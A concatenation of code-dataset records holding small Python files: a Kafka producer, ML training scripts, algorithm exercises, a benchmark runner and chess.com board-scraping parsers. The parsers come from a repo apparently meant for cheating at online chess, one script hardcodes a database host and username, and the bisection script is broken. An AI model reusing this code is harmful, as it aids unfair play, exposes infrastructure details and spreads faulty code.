json.dumps(jsonObj)\n\n# vehicle_topic'e mesajı yolluyoruz.\nproducer.produce(topic=\"vehicle_topic\",\n value=jsonStr,\n callback=cbfunction)\nproducer.poll(1)\n","repo_name":"Akilli-Trafik/PubSub","sub_path":"producer/imageproducer.py","file_name":"imageproducer.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14631997132","text":"from waldur_mastermind.invoices import views\n\n\ndef register_in(router):\n router.register(r'invoices', views.InvoiceViewSet, basename='invoice')\n router.register(\n r'payment-profiles', views.PaymentProfileViewSet, basename='payment-profile',\n )\n router.register(\n r'payments', views.PaymentViewSet, basename='payment',\n )\n","repo_name":"AkmonEnviroment/waldur-mastermind","sub_path":"src/waldur_mastermind/invoices/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"15447392543","text":"#!/usr/bin/env python\n\ndef setup():\n import os, subprocess, datetime\n if os.path.exists(os.path.join(os.getcwd(), \"setup.log\")):\n print(\"'setup.log' exists. Rust implementation setup correctly\")\n return\n\n # We can't really setup this successfully, we need a build system like CMake or scons for xplat support\n print(\"Watch for Errors - Requires Cargo and the Rust toolchain\")\n try:\n with open('setup.log', 'w') as logFile:\n logFile.write(\"# This is an autogenerated file made by 'run.py' on {}\\n\".format(datetime.datetime.now()))\n logFile.write(\"# => DO NOT DELETE THIS FILE OR SETUP WILL BE CALLED AGAIN\\n\")\n\n logFile.flush()\n subprocess.run([\"rustc\", \"-V\"], stdout = logFile, stderr = logFile, check=True)\n subprocess.run([\"cargo\", \"-V\"], stdout = logFile, stderr = logFile, check=True)\n subprocess.run([\"cargo\", \"update\",\"-v\"], stdout = logFile, stderr = logFile, check=True)\n logFile.flush()\n\n logFile.write(\"\\n# Setup completed on {}\".format(datetime.datetime.now()))\n #end logFile\n except Exception as e:\n print(e)\n if os.path.exists('setup.log'):\n os.remove('setup.log')\n#end run\n\ndef build():\n import subprocess\n retcode = subprocess.call(['cargo', 'build', '--release'])\n if retcode != 0:\n raise AssertionError(\"Build failed\")\n print(\"Successfully built Rust implementation\")\n#end run\n\ndef run(cmd_args):\n import subprocess\n\n # We won't call 'cargo run' here to avoid the overhead\n process_args = ['./target/release/rust'] + cmd_args\n retcode = subprocess.call(process_args)\n if retcode != 0:\n raise RuntimeError(\"Program run returned non-zero exit code\")\n#end run\n\nif __name__==\"__main__\":\n import sys, os\n \n setup()\n build()\n if os.path.basename(sys.argv[0]) == os.path.basename(__file__):\n run(sys.argv[1:])\n# end main\n ","repo_name":"foxtrotzulu94/LanguageBenchmarkGame","sub_path":"rust/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29583084305","text":"import sys\r\nfrom collections import deque\r\n\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\nmaze = []\r\n\r\nfor _ in range(n):\r\n maze.append(\r\n list(map(int, input().rstrip()))\r\n ) # readline의 경우 맨 뒤에 '\\n'까지 입력받으므로 제거해줘야 함\r\n\r\n# 상하좌우\r\ndx = [-1, 1, 0, 0]\r\ndy = [0, 0, -1, 1]\r\n\r\n\r\ndef bfs(x, y):\r\n q = deque()\r\n q.append((x, y))\r\n\r\n while q:\r\n x, y = q.popleft()\r\n\r\n for i in range(4):\r\n nx = x + dx[i]\r\n ny = y + dy[i]\r\n\r\n if 0 <= nx < n and 0 <= ny < m and maze[nx][ny] == 1:\r\n q.append((nx, ny))\r\n maze[nx][ny] = maze[x][y] + 1\r\n return maze[n - 1][m - 1]\r\n\r\n\r\nprint(bfs(0, 0))\r\n\r\n## bfs로 지나가는길을 전에 지나온길 +1을 해준다\r\n","repo_name":"jeonbar2/Coding_Test","sub_path":"백준/Silver/2178. 미로 탐색/미로 탐색.py","file_name":"미로 탐색.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19905596967","text":"import os\nimport sys\nimport time\nimport numpy as np\nimport pandas as pd\nfrom backports import tempfile\nfrom multiprocessing import Pool\nos.chdir('/home/ec2-user/healthrex/CDSS/medinfo/dataconversion')\nfrom medinfo.dataconversion import FeatureMatrixFactory as fmf\nfrom medinfo.dataconversion import FeatureMatrix as fm\nos.chdir('/home/ec2-user/cs230/scripts/matrix/icu2')\nimport psycopg2\nfrom datetime import timedelta\n\n# Code to connect to database:\n\ndsn_pwd = input(\"Enter the database password: \")\ndef connectToDB(dsn_pwd):\n '''\n Connects to Database, requires password\n '''\n\n dsn_database = \"medinfo\"\n dsn_hostname = \"healthrex-db.cwyfvxgvic6c.us-east-1.rds.amazonaws.com\"\n dsn_port = \"5432\"\n dsn_uid = \"jonc101\"\n\n\n try:\n conn_string = \"host='\"+dsn_hostname+\"' port=\"+dsn_port+\" dbname='\"+dsn_database+\"' user='\"+dsn_uid+\"' password='\"+dsn_pwd+\"'\"\n print(\"Connecting to database\\n ->%s\" % (conn_string))\n conn=psycopg2.connect(conn_string)\n print(\"Connected!\\n\")\n\n except:\n print(\"Unable to connect to the database.\")\n\n cursor = conn.cursor()\n return cursor\n\ncursor = connectToDB(dsn_pwd) # Establish the connection to the database\n\n\n# Select clinical items we want to pre-process\ncursor.execute(\"\"\"SELECT DISTINCT(name) FROM clinical_item WHERE analysis_status = 1\"\"\")\nclinical_item_names = []\nfor elem in cursor:\n clinical_item_names.append(elem[0])\n\n# Get total count of all the patient items we want\ncursor.execute(\"SELECT COUNT(*) FROM patient_item where NOT (encounter_id IS NULL)\")\ntotal_count = int(cursor.fetchall()[0][0])\n\n# Query in batches of batch_size\nbatch_size = 100000\nnum_iterations = total_count/batch_size + 1\noutputdir = os.getcwd()\n\n# The query and pre-processing for each batch\ndef queryItems(i):\n global batch_size\n global clinical_item_names\n global dsn_pwd\n global outputdir\n start_time = time.time()\n offset = batch_size*i\n print('Iteration : {} (Batch size: {}; Offset: {})'.format(str(i), str(batch_size), str(offset)))\n\n data = None\n with tempfile.TemporaryDirectory() as path:\n os.chdir(path)\n cursor = connectToDB(dsn_pwd)\n cursor.execute(\"SELECT * from patient_item where NOT (encounter_id IS NULL) order by encounter_id DESC LIMIT %s OFFSET %s\", (str(batch_size), str(offset)))\n\n # Initialize FeatureMatrix\n factory = fm.FeatureMatrix(variable = 'hi', num_data_points=100000000, params=None)\n\n # Add features\n factory._factory.setPatientEpisodeInput(cursor)\n factory._factory.processPatientEpisodeInput()\n factory._add_features(index_time_col='item_date')\n factory._factory.addClinicalItemFeatures(['Death'], dayBins=[1,7,30], features=\"post\")\n\n # Add relevant clinical item features\n for item in clinical_item_names:\n print(item)\n factory._factory.addClinicalItemFeatures(clinicalItemNames=[item], dayBins=[1,7,30], features=\"all\")\n\n # Output the feature matrix for this iteration\n factory._factory.buildFeatureMatrix(matrixFileName=outputdir+\"/FINAL_iteration_{}.txt\".format(str(i)))\n end_time = time.time()\n \n print('Completed Iteration : {} in time : {}'.format(str(i), str(end_time-start_time)))\n return 0\n\n# Do multiprocessing of the batches\n\npool = Pool(14)\niterations = list(range(0, num_iterations))\npool.map(queryItems, iterations, chunksize=1)\n\n","repo_name":"HealthRex/CDSS","sub_path":"scripts/Archive/DeepLearningRecommender/makeMatrix.py","file_name":"makeMatrix.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"2"} +{"seq_id":"15750068655","text":"from . import IParser\nfrom chessboard import Chessboard, Pieces, Square\nfrom game import Moves\nimport lxml.html as html\nimport re\nfrom lxml.etree import ParserError\n\n\nclass ChessComMovesOnlineParser(IParser):\n @staticmethod\n def parsable(data):\n if type(data) == str:\n try:\n root = html.fromstring(data)\n elements = root.xpath(\".//span[contains(@class, 'move-text-component')]\")\n if len(elements) > 0:\n return True\n except (KeyError, ParserError):\n pass\n return False\n\n @staticmethod\n def parse(data):\n\n root = html.fromstring(data)\n elements = root.xpath(\".//span[contains(@class, 'move-text-component')]/text()\")\n\n moves = list()\n\n for e in elements:\n e = e.strip()\n if e != '':\n moves.append(e)\n\n return Moves(moves)\n\n\nclass ChessComMovesOfflineParser(IParser):\n @staticmethod\n def parsable(data):\n if type(data) == str:\n try:\n root = html.fromstring(data)\n elements = root.xpath(\".//a[contains(@class, 'gotomove')]\")\n if len(elements) > 0:\n return True\n elements = root.xpath(\".//span[contains(@class, 'gotomove')]\")\n\n except (KeyError, ParserError):\n pass\n return False\n\n @staticmethod\n def parse(data):\n\n root = html.fromstring(data)\n elements = root.xpath(\".//a[contains(@class, 'gotomove')]/text()\")\n\n moves = list()\n\n for e in elements:\n e = e.strip()\n if e != '':\n moves.append(e)\n\n return Moves(moves)\n\n\nclass ChessComBoardOnlineParser(IParser):\n\n @staticmethod\n def parsable(data):\n if type(data) == str:\n try:\n root = html.fromstring(data)\n root.get_element_by_id(\"game-board\")\n return True\n except (KeyError, ParserError):\n pass\n return False\n\n @staticmethod\n def parse(data):\n def _url_to_piece(url: str):\n line = url.split('/')[-1]\n line = re.sub(r'\\.\\S+', '', line)\n return Pieces.get(line[1], True if line[0] == 'w' else False)\n\n chessboard = Chessboard()\n pattern_url = re.compile(r'url\\(\"([^)]+)\"\\)')\n pattern_square = re.compile(\"square-(\\d+)\")\n root = html.fromstring(data)\n element = root.get_element_by_id(\"game-board\")\n pieces_element = element.find_class('pieces')[0]\n\n squares, pieces = list(), list()\n\n for p in pieces_element:\n coords = pattern_square.search(p.get('class')).group(1)\n style = p.get('style')\n url = pattern_url.search(style).group(1)\n square = Square.index_to_square(int(coords[-2:]) - 1, int(coords[:2]) - 1)\n piece = _url_to_piece(url)\n squares.append(square)\n pieces.append(piece)\n\n chessboard.update_squares(squares, pieces)\n\n return chessboard\n\n\nclass ChessComBoardOfflineParser(IParser):\n\n @staticmethod\n def parsable(data):\n if type(data) == str:\n root = html.fromstring(data)\n try:\n element = root.get_element_by_id(\"chessboard_boardarea\")\n classes = element.find_class('chess_com_piece')\n\n for cls in classes:\n if 'dragging' in cls.get('class'):\n return False\n return True\n except (KeyError, ParserError):\n pass\n return False\n\n @staticmethod\n def parse(data):\n def _url_to_piece(url: str):\n line = url.split('/')[-1]\n line = re.sub(r'\\.\\S+', '', line)\n return Pieces.get(line[1], True if line[0] == 'w' else False)\n\n def _get_translation(line):\n translate_match = pattern.search(line)\n if translate_match is not None:\n x = int(translate_match.group(1))\n y = int(translate_match.group(2))\n return x, y\n\n else:\n return -1, -1\n\n chessboard = Chessboard()\n pattern = re.compile(r'translate\\((\\d+)px,\\s*(\\d+)px\\)')\n\n root = html.fromstring(data)\n element = root.get_element_by_id(\"chessboard_boardarea\")\n classes = element.find_class('chess_com_piece')\n\n squares, pieces = list(), list()\n\n for cls in classes:\n w = int(cls.get('width'))\n h = int(cls.get('height'))\n style = cls.get('style')\n src = cls.get('src')\n x, y = _get_translation(style)\n if x == -1 or y == -1:\n return None\n row, col = 7 - y / h, x / w\n if not row.is_integer() or not col.is_integer():\n return None\n square = Square.index_to_square(int(row), int(col))\n piece = _url_to_piece(src)\n\n squares.append(square)\n pieces.append(piece)\n\n chessboard.update_squares(squares, pieces)\n\n return chessboard\n","repo_name":"RafalStaszak/ChessCheat","sub_path":"parsing/chesscom.py","file_name":"chesscom.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4775409520","text":"import sys\n\nN, Y = map(int, input().split())\n\nmax_man = Y // 10000\n\nfor i in range(max_man+1):\n max_gosen = (Y - 10000*i) // 5000\n for j in range(max_gosen+1):\n# print(\"i\", i)\n# print(\"j\", j)\n if 10000 * i + 5000 * j + 1000 * (N-i-j) == Y:\n print(i, j, N-i-j)\n sys.exit()\n\nprint(-1, -1, -1)\n","repo_name":"yudaiOfRiver/atcoder","sub_path":"85/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3208035288","text":"import string\nimport random\nimport re\nimport math\nimport os\nimport subprocess\nimport time\nimport sys\n######### Settings of the experiments #############\nalphabet = ['A', 'C', 'G', 'T']\n# Each file contains the (randomly generated) sequences of a given length (from 'text_size'); The number of sequences decided by 'num_seq_in_file' .\n# Each sequence of the specified length will have copies equal to size of 'k' (Here45).\n# Each copy will have randomly distributed elastic-degenerate symbols equal to the given value from alpha.\n# Each sybol will have a randomly chosen collection from the alphabet\n#text_size = [1000, 2000, 4000, 8000, 16000, 32000, 64000]\n#pattern_size = [8, 16, 32, 64]\n#alpha = [10, 20, 40, 80] \ntext_size = [10, 100]\npattern_size = [4,8]\nalpha = [10]\ndeg_symb = 10 # in percent\nmax_len_in_els = 10 \nnum_sets = 2\nparam_separator = '\\t'\n###################################################\n\nFOLDER = './experiments/'\nDATA_FOLDER = 'data/'\nINPUT_FILE_NAME = 'input'\nPATTERN_FILE_NAME = 'pattern'\nOUTPUT_FILE_NAME = 'output'\nSTATS_FILE_NAME = 'stats.txt'\n\nstats_param = ['m', 'n', 'time']\n\n###################################################\n# stats dictionary: rows= seq_size, columns = pattern_size\nstats_dct = [[0,0],[0,0]]\n\n\ndef memory_usage_resource():\n import resource\n rusage_denom = 1024.\n if sys.platform == 'darwin':\n # OSX produces the output in different units\n rusage_denom = rusage_denom * rusage_denom\n mem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom\n return mem\n\n\ndef collect_stats_old(o_file, stats_file):\n n = []\n d = []\n tm = []\n block_size = 5\n with open(o_file, \"r\") as f:\n mode = 0\n # 1st line seq name, next time, next n & k , next LPF array, next blank\n for line in f:\n if (mode == 0 or mode == 3 or mode == 4):\n # Ignore line \n dummy = line\n elif (mode ==1):\n tmf = re.findall(\"\\d+\\.\\d+\", line)\n tm.append(str(tmf[0]))\n else:\n seq_len, sd = line.split(' ')\n n.append(seq_len)\n d.append(sd)\n mode = (mode + 1) % block_size\n #num = num_seq_in_file * len(k)\n num=0\n for ind in range(num):\n stats_file.write(str(n[ind]) + param_separator + str(alpha[ind]) +\n param_separator + tm[ind] + '\\n')\n\ndef collect_stats(o_file):\n with open(o_file, \"r\") as f:\n # first line num of patterns ; ignore\n f.readline()\n\n # next line time\n line = f.readline()\n tmf = re.findall(\"\\d+\\.\\d+\", line)\n return str(tmf[0]) \n\n\n\ndef write_file(seq_file, seq_size, seq, a):\n d = seq_size / 10\n symb_pos = random.sample(range(seq_size), d)\n symb_pos_sorted = sorted(symb_pos)\n symb_pos_sorted.append(seq_size)\n nxt = 0\n \n #seq_file.write('>seq ' + str(seq_size) + '_' + str(a) + '\\n')\n for ind in range(seq_size):\n if ind != symb_pos_sorted[nxt]:\n seq_file.write(seq[ind])\n else:\n empty_included = False\n sym_size = random.randint(2, a)\n seq_file.write('{')\n alleles = []\n for i in range(sym_size):\n allele_len = random.randint(0, max_len_in_els)\n allele = ''.join(random.choice(alphabet) for i in range(allele_len))\n if allele == '':\n if empty_included:\n i = i-1\n else:\n empty_included = True # first empty string included\n allele = 'E'\n alleles.append(allele)\n else:\n alleles.append(allele)\n symb = ','.join(alleles)\n seq_file.write(symb)\n seq_file.write('}')\n nxt += 1\n \n seq_file.write('\\n\\n')\n\n\ndef onse_set(set_num):\n i_filename = FOLDER + DATA_FOLDER + str(set_num) + '/' + INPUT_FILE_NAME\n p_filename = FOLDER + DATA_FOLDER + str(set_num) + '/' + PATTERN_FILE_NAME\n o_filename = FOLDER + DATA_FOLDER + str(set_num) + '/' + OUTPUT_FILE_NAME\n \n\n # Generate Pattern Files\n #num_pat = len(pattern_size)\n for p_len in pattern_size:\n psuff = '.p' + str(p_len) + '.txt'\n pat_filename = p_filename + psuff\n pat_file = open(pat_filename, 'w')\n pattern = ''.join(random.choice(alphabet) for i in range(p_len))\n pat_file.write(pattern + '\\n\\n')\n pat_file.close()\n print(\"$$$$$$$$$$$$$$$$$$$$ PATTERN FILE GENERATION COMPLETE $$$$$$$$$$$$$$$$$$$$$$\")\n\n # Generate Data Files\n num_files = len(text_size)\n for i in range(num_files):\n seq_size = text_size[i]\n seq = ''.join(random.choice(alphabet) for i in range(seq_size))\n for a in alpha:\n print(\"====== WRITING INPUT FILE ===== \" + str(i))\n suff = '.n' + str(seq_size) + '.a' + str(a) + '.txt'\n seq_filename = i_filename + suff\n seq_file = open(seq_filename, 'w') \n write_file(seq_file, seq_size, seq, a)\n seq_file.close()\n \n print(\"$$$$$$$$$$$$$$$$$$$$ INPUT FILE GENERATION COMPLETE $$$$$$$$$$$$$$$$$$$$$$\")\n\n # Run the tool on the files\n for p_len in pattern_size:\n psuff = '.p' + str(p_len)\n pat_filename = p_filename + psuff + '.txt'\n \n for seq_size in text_size:\n for a in alpha:\n print(\"====== RUNNING PATTERN-INPUT FILE ===== \" + str(p_len) + ' : ' + str(seq_size))\n suff = '.n' + str(seq_size) + '.a' + str(a)\n seq_filename = i_filename + suff + '.txt'\n outsuff = suff + psuff\n out_filename = o_filename + outsuff + '.txt'\n # Call the tool\n tool = './bin/eldes'\n cmd = tool + ' -a DNA -t ' + seq_filename + ' -p ' + pat_filename + ' -o ' + out_filename\n print('COMMAND: ' + cmd)\n comp = subprocess.Popen(cmd, shell=True)\n comp.wait()\n\n print(\"$$$$$$$$$$$$$$$$$$$$ FILE PROCESSING COMPLETE $$$$$$$$$$$$$$$$$$$$$$\")\n\n # Analyse the output files\n for j in range(len(pattern_size)):\n p_len = pattern_size[j]\n psuff = '.p' + str(p_len)\n for i in range(len(text_size)):\n seq_size = text_size[i]\n for a in alpha:\n suff = '.n' + str(seq_size) + '.a' + str(a)\n outsuff = suff + psuff\n out_filename = o_filename + outsuff + '.txt'\n tm = float(collect_stats(out_filename))\n stats_dct[i][j] += tm\n \n\n\ndef main():\n for i in range(num_sets):\n cmd = 'mkdir ' + FOLDER + DATA_FOLDER + str(i+1)\n comp = subprocess.Popen(cmd, shell=True)\n comp.wait()\n\n for i in range(num_sets):\n print('********************************************* SET Number '+ str(i) +' ************************************' )\n onse_set(i+1)\n print('************************ done\\n')\n\n sf = open(FOLDER + STATS_FILE_NAME+'.stats', 'w') \n sf.write(param_separator.join(stats_param))\n # Analyse the output files\n for j in range(len(pattern_size)):\n p_len = pattern_size[j]\n sf.write('\\n')\n for i in range(len(text_size)): \n seq_size = text_size[i]\n stats = str(p_len) + param_separator + str(seq_size) + param_separator \n tm = stats_dct[i][j]\n tm = tm/num_sets\n stats += str(tm)\n sf.write(stats)\n sf.write('\\n')\n sf.close()\n\nmain()\n","repo_name":"Ritu-Kundu/ElDeS","sub_path":"scripts/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":7680,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"40730541223","text":"from collections import defaultdict\nfrom sklearn.metrics import label_ranking_average_precision_score\nimport torch\nfrom torch.nn import functional as F\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom sklearn.preprocessing import minmax_scale\n\nimport utils\n\nplt.switch_backend('agg')\n\n\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\ndef apply_wd(model, gamma):\n for name, tensor in model.named_parameters():\n if 'bias' in name:\n continue\n tensor.data.add_(-gamma * tensor.data)\n\n\ndef grad_norm(model):\n grad = 0.0\n count = 0\n for name, tensor in model.named_parameters():\n if tensor.grad is not None:\n grad += torch.sqrt(torch.sum((tensor.grad.data) ** 2))\n count += 1\n return grad.cpu().numpy() / count\n\n#____________\n# mixup function\ndef mixup_data(x, y, alpha=1.0, use_cuda=True):\n '''Returns mixed inputs, pairs of targets, and lambda'''\n if alpha > 0:\n lam = np.random.beta(alpha, alpha)\n else:\n lam = 1\n\n indices = torch.randperm(x.size()[0])\n x2 = x[indices]\n y2 = y[indices]\n \n mixed_x = lam * x + (1 - lam) * x2\n mixed_y = lam * y + (1 - lam) * y2\n return mixed_x, mixed_y, lam\n\nfrom torch.autograd import Variable\n\n#____________\n\nclass Trainer:\n global_step = 0\n\n def __init__(self, train_writer=None, eval_writer=None, compute_grads=True, device=None):\n if device is None:\n if torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n self.device = device\n self.train_writer = train_writer\n self.eval_writer = eval_writer\n self.compute_grads = compute_grads\n\n def train_epoch(self, model, optimizer, scheduler, dataloader, lr, log_prefix=\"\"):\n device = self.device\n \n alpha = 0.1 # add mixup ration parameter\n \n model = model.to(device)\n model.train()\n for param_group in optimizer.param_groups:\n param_group['lr'] = scheduler.get_lr()[0] #lr\n\n for batch in tqdm(dataloader):\n x = batch['logmel'].to(device)\n y = batch['labels'].to(device)\n \n optimizer.zero_grad()\n #out = model(x)\n \n # mixup\n inputs, targets, lam = mixup_data(x, y, alpha)\n inputs, targets = map(Variable, (inputs, targets))\n out = model(inputs)\n \n out1 = torch.tensor(minmax_scale(out.reshape(-1).cpu().detach().numpy(), (0.00001,0.99999)))\n t1 = torch.tensor(minmax_scale(targets.reshape(-1).cpu().detach().numpy(), (0.00001,0.99999)))\n out1, t1 = map(Variable, (out1, t1))\n \n l_1 = F.binary_cross_entropy(out1, t1)\n loss = F.binary_cross_entropy_with_logits(out, targets) + l_1\n \n loss.backward()\n optimizer.step()\n\n probs = torch.sigmoid(out).cpu().data.numpy()\n lrap = label_ranking_average_precision_score(batch['labels'], probs)\n\n log_entry = dict(\n lrap=lrap,\n loss=loss.item(),\n lr=scheduler.get_lr()[0],\n )\n if self.compute_grads:\n log_entry['grad_norm'] = grad_norm(model)\n\n for name, value in log_entry.items():\n if log_prefix != '':\n name = log_prefix + '/' + name\n self.train_writer.add_scalar(name, value, global_step=self.global_step)\n self.global_step += 1\n\n def eval_epoch(self, model, dataloader, log_prefix=\"\"):\n if torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n\n model = model.to(device)\n model.eval()\n metrics = defaultdict(list)\n lwlrap = utils.lwlrap_accumulator()\n for batch in tqdm(dataloader):\n with torch.no_grad():\n x = batch['logmel'].to(device)\n y = batch['labels'].to(device)\n out = model(x)\n loss = F.binary_cross_entropy_with_logits(out, y)\n probs = torch.sigmoid(out).cpu().data.numpy()\n lrap = label_ranking_average_precision_score(batch['labels'], probs)\n lwlrap.accumulate_samples(batch['labels'], probs)\n\n metrics['loss'].append(loss.item())\n metrics['lrap'].append(lrap)\n\n metrics = {key: np.mean(values) for key, values in metrics.items()}\n metrics['lwlrap'] = lwlrap.overall_lwlrap()\n for name, value in metrics.items():\n if log_prefix != '':\n name = log_prefix + '/' + name\n self.eval_writer.add_scalar(name, value, global_step=self.global_step)\n\n fig = plt.figure(figsize=(12, 9))\n z = lwlrap.per_class_lwlrap() * lwlrap.per_class_weight()\n plt.bar(np.arange(len(z)), z)\n plt.hlines(np.mean(z), 0, len(z), linestyles='dashed')\n plt.ylim([0, 0.013])\n plt.xlim([-1, 80])\n plt.grid()\n self.eval_writer.add_figure('per_class_weighted_lwlrap', fig, global_step=self.global_step)\n\n fig = plt.figure(figsize=(12, 9))\n z = lwlrap.per_class_lwlrap()\n plt.bar(np.arange(len(z)), z)\n plt.hlines(np.mean(z), 0, len(z), linestyles='dashed')\n plt.xlim([-1, 80])\n plt.grid()\n self.eval_writer.add_figure('per_class_lwlrap', fig, global_step=self.global_step)\n\n return metrics\n","repo_name":"krDaria/dl_project_fat2019","sub_path":"scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21401992766","text":"import os\nfrom os.path import join\nimport numpy as np\nfrom scipy.sparse import coo_matrix as cmat\nfrom sklearn.naive_bayes import MultinomialNB as MNB, BernoulliNB as BNB\nfrom sklearn.metrics import accuracy_score\n\npath = 'ex6_prep/'\nX_trn_fn = join(path, 'train-features.txt')\ny_trn_fn = join(path, 'train-labels.txt')\nX_tst_fn = join(path, 'test-features.txt')\ny_tst_fn = join(path, 'test-labels.txt')\n\nnwords = 2500\n\ndef read_data(X_fn, y_fn):\n X = np.loadtxt(X_fn)\n y = np.loadtxt(y_fn)\n row = X[:,0] - 1\n col = X[:,1] - 1\n dat = X[:,2]\n\n X = cmat((dat, (row, col)), shape=(len(y), nwords))\n return X, y\n\nX_trn, y_trn = read_data(X_trn_fn, y_trn_fn)\nX_tst, y_tst = read_data(X_tst_fn, y_tst_fn)\nprint('train size: ', y_trn.shape)\nprint('test size: ', y_tst.shape)\n\nmodel = MNB()\nmodel.fit(X_trn, y_trn)\n\ny_prd = model.predict(X_tst)\nscore = accuracy_score(y_tst, y_prd)\nprint('score: ', score)\n","repo_name":"hnmspirit/mlcb","sub_path":"a32_nbc/mnb_spam.py","file_name":"mnb_spam.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"23520895094","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\ndef calculate_distance(pointA,pointB):\n sum=0\n for i in range(0,len(pointA)):\n sum+=(pointA[i]-pointB[i]) **2\n return math.sqrt(sum)\n\ndef set_new_cluster(clusters):\n index_new_cluster=-10\n other_index=-10\n minm=1000000\n for i in range(0,len(clusters)):\n for ii in range(0,len(clusters)):\n for j in range(0,len(clusters[i])):\n for jj in range(0,len(clusters[ii])):\n if calculate_distance(clusters[ii][jj],clusters[i][j]) < minm and i != ii and minm!=0:\n if clusters[ii][jj]==clusters[i][j]:\n pass\n else:\n minm=calculate_distance(clusters[ii][jj],clusters[i][j])\n index_new_cluster=ii\n other_index=i\n new_cluster=[]\n for i in range(0,len(clusters)):\n if i == min(other_index,index_new_cluster):\n other_list=[]\n for elem in clusters[index_new_cluster]:\n other_list.append(elem)\n for elem in clusters[other_index]:\n other_list.append(elem)\n new_cluster.append(other_list)\n # clusters.remove(clusters[other_index])\n # clusters.remove(clusters[index_new_cluster])\n else:\n if i == other_index or i == index_new_cluster:\n pass\n else:\n new_cluster.append(clusters[i])\n return new_cluster\n \npoints=[]\nfor i in range(0,10):\n x=random.randint(0,100)\n y=random.randint(0,100)\n points.append([x,y])\n \nclusters=[] \nfor elem in points:\n clusters.append([elem])\n\n\nnewc=clusters\nprint(newc)\n\nfor i in range(0, len(clusters) -1):\n newc=set_new_cluster(newc)\n x=[]\n y=[]\n xx=[]\n yy=[]\n for elem in newc:\n #plt.plot(elem,'o',color='black')\n print(elem)\n x.append(elem[0][0])\n y.append(elem[0][1])\n if len(elem) >1:\n for e in elem:\n xx.append(e[0])\n yy.append(e[1])\n plt.plot(x,y,'o',color='black')\n plt.plot(xx,yy,'o',color='red')\n plt.show()\n print(newc)","repo_name":"DanilaIonutRomica/Hierarchical_Clustering","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30004930281","text":"\n\n\nimport numpy as np \nfrom matplotlib import pyplot as plt\n\n\n\n\n\n\n# The function we wanna calculate there racins \"Solutions\"\ndef f(x):\n\n return x**3-(11/6)*(x**2)+x-1/6 \n\n# Dichotonomie Methode of calculation :\n\n# The interval \na = int(input(\"Give us the first number of the interval: \"))\nb = int(input(\"Give us the second nimber of the interval: \"))\n\n#eps = real(input(\"Give us the epsilon number :\")) # nombre of iteration \neps = 10**-2\nn = 1 #Init at 1 \n# Dichotomy Algorithm :\ndef dichotomy(a,b,eps):\n while abs(f(b)-f(a)) > eps:\n root = None #intialise the root \"solution \" to None \n mid = (a+b)/2\n print(f'abs((a-b)/2)>eps was True, x is {x}!') ####\n # check \n if f(mid) == 0 or abs(f(mid)) < eps: \n root = mid # This to find out if the mid is close to the solution \n \n if f(a)*f(mid) <= 0:\n a = mid # make the a mid to do another mid also until it came up with the solution \n\n else:\n b = mid #make the b mid to do another mid also until it came up with the solution\n\n n = n + 1\n if root is None:\n print('Root not found') # solution not found \n else:\n print(f'The root, according to the dichotomy method, is at the point x = {root}') # print the solution\n\n#dichotomy(a,b,eps)\n\n \n# graph of the function :\n# use matplotlib\n\npltr = input(\"Do you wanna plot the fonction graph?:[y/n]:\")\n\nx = np.linspace(a,0.0001,b) # the interval of the plot [a,b] and the x\n\ny = x**3-(11/6)*(x**2)+x-1/6 # the function we wanna plot f(x) = y\n\nif pltr == \"y\" :\n plt.plot(x, y, c = \"black\",) # use any color you want the standard is blue \n plt.title(input(\"Give us the Function Title: \"))\n plt.xlabel(\"axe x\") # name the axes as x and y ...\n plt.ylabel(\"axe y\") \n plt.show() # if True the graph will show up \nelif pltr == \"n\":\n print(\"OK,Thank you\")\n\n\n# if there is an error :\nelse:\n print(\"Error, You didn't choose [y/n] Try again.\")\n\n","repo_name":"adelkandi/MN_Dicho","sub_path":"Dicho.py","file_name":"Dicho.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"7934437829","text":"import json\nfrom unittest import mock\n\nfrom bankaccount.usecases import response_objects as resp\nfrom bankaccount.entities.transfer import Transfer\nfrom bankaccount.entities.account import Account\n\n\ntest_trs = Transfer(\n trs_id=1,\n trs_timestamp=\"2019-01-22 09:00:00\",\n trs_from=Account.from_dict({'code':\"1234567890F\", 'balance':1000}),\n trs_to=Account.from_dict({'code':\"3333333333A\", 'balance':1000}),\n trs_amount=321.00\n 